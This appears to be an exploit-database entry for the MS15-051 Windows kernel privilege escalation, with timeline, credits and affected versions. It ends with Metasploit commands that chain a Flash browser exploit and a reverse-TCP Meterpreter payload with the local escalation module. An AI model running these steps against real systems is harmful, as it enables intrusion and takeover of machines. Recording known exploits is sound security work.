Timeline :
Vulnerability discovered exploited in the wild by FireEye the 2015-04-13
Patch provided by the vendor via MS15-051 the 2015-05-12
PoC provided by hfiref0x the 2015-05-12
Metasploit PoC provided the 2015-06-03
PoC provided by :
Unknown
hfirefox
OJ Reeves
Spencer McIntyre
Reference(s) :
Affected version(s) :
Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1
Tested onĀ :
Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation
Description :
This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
Commands :
Remote exploitation use exploit/multi/browser/adobe_flash_shader_drawing_fill set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid Local privileges escalation use exploit/windows/local/ms15_051_client_copy_image set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 4445 set SESSION 1 run getuid